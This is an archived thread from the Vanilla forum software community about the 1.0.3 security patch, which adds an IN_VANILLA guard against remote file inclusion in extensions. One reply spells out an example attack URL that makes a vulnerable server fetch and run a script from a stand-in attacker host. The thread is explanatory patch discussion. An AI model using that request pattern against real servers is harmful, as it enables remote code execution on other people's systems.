Vanilla 1 is no longer supported or maintained. If you need a copy, you can get it here.
HackerOne users: Testing against this community violates our program's Terms of Service and will result in your bounty being denied.
Options

! Vanilla 1.0.3 Released !

MarkMark Vanilla Staff
edited February 2007 in Vanilla 1.0 Help
This release patches a potential security hole in Vanilla. To read more about the patch and how to apply it, read the blog entry.
«13

Comments

  • Options
    Thanks Mark, 1.0.2 patch successfully applied here.
    Any reason why lussumo.com/community is still on 1.0.1?
  • Options
    register_globals is certainly off on the Lussumo server, so he didn't rush to install it.
  • Options
    MarkMark Vanilla Staff
    Just released another version. This one doesn't require that you download and replace files. Just add this code to your conf/extensions.php file before any extensions are included:

    if (!defined('IN_VANILLA')) exit();

    Thanks to Dinoboff for pointing out this additional spot where the patch is required.
  • Options
    As every extension dev, I received a warning to add this check if the extension include some other file.
    Could someone (Dinoboff?) point out why this is needed? The patched main init_* should already have exited, before loading extensions, is'nt it?
  • Options
    Before I go on an update frenzy... Do I need to add that line to my ajax pages? or only when I include non-Vanilla files from the main extension?
  • Options
    edited December 2006
    With register_globals on (with allow_url_fopen on), if you have a file, extensions/example/default.php, that has something like:include($foo . 'bar.php');
    The bad guy just have to access www.victim.com/extensions/example/default.php?foo=http://www.badguy.com/evilscripts/ to execute http://www.badguy.com/evilscripts/bar.php on your server.

    That is especially risky with extension files since we don't include any .htaccess file with them like the one that is in appg/
  • Options
    Max_B: This is needed to prevent the possibility that an attacker could inject a file path into the extension which may cause it to include malicious code. The if statement checks to ensure the extension is being called legitimately by Vanilla rather than directly by a attacker. Jazzman: I took a peek (of the TODO list extension) and you used include('../../appg/settings.php');... this is fine, but if you had used include($Configuration['APPLICATION_PATH'.'/appg/settings.php']);, then you would need to do the check first. http://en.wikipedia.org/wiki/Code_injection
  • Options
    Right, I did'nt notice that the extensions folder has no denying .htaccess
    I'd suggest to add one as a supplemental precaution.

    Ah, BTW, the debug.php file in the Vanilla root folder has such includes and is not patched.
  • Options
    Which also begs the question, would a .htaccess file in the extension dirs help matters?
  • Options
    debug.php include the appg/settings.php at the start.
  • Options
    /me ducks as something flies over his head.

    OK, I'm sure that means something to most people, but it means nothing to me :) What does it mean? :D
  • Options
    Stash -- I think Dinoboff's post was in response to Max_B's, not yours.

    Anyway, in response to your question... Possibly (I'm not sure), but it would be much less straightforward than the appg/.htaccess. The tricky part is that some files in extension directories do need to be fetched by clients, including calling PHP scripts sometimes, such as AJAX handlers. So we can't simply block all access like we do in appg.
  • Options
    OK, 1.0.3 code added.

    Do we also update this in appg/settings.php to 1.0.3?

    define('APPLICATION_VERSION', '1.0.2');

    Will it stuff up the Check for Updates gadget?
  • Options
    I've updated my Panel Order extension for those who use it.
  • Options
    edited December 2006
    I don't think it needed it.

    So far, the only extensions (from the ones that I have installed) that need to be updated are the Atom, RSS2 and Patch Request Password extensions.
  • Options
    It probably didnt, but it does include some files during its execution. Figured it was better to be safe than sorry :)
  • Options
    MarkMark Vanilla Staff
    @Wanderer - Yes, you can update that version setting so that your update checker works properly. It won't break anything to do so.

    @Max_B - Dinoboff is correct that the debug.php file is safe since the file includes the appg/settings.php file before any other files are included. This makes it so that no matter what an attacker puts in the querystring, the values are re-defined first by the appg/settings.php version of the variables, and then again by your custom conf/settings.php variables.

    @Dinoboff - I've updated the Atom, RSS2, and IpHistory extensions. They were the only extensions written by me that needed the patch.
  • Options
    MarkMark Vanilla Staff
    @Stash - Which also begs the question, would a .htaccess file in the extension dirs help matters?

    Some servers might not have .htaccess files enabled, so I have to assume that they don't when applying code-fixes.
  • Options
    OK, thanks for clearing that up Mark :)
  • Options
    I tried changing the line in my conf/extensions.php file but then the forum didn't load at all (blank white page). Is there something else that needs to be done to go from 1.0.2 to 1.0.3?
This discussion has been closed.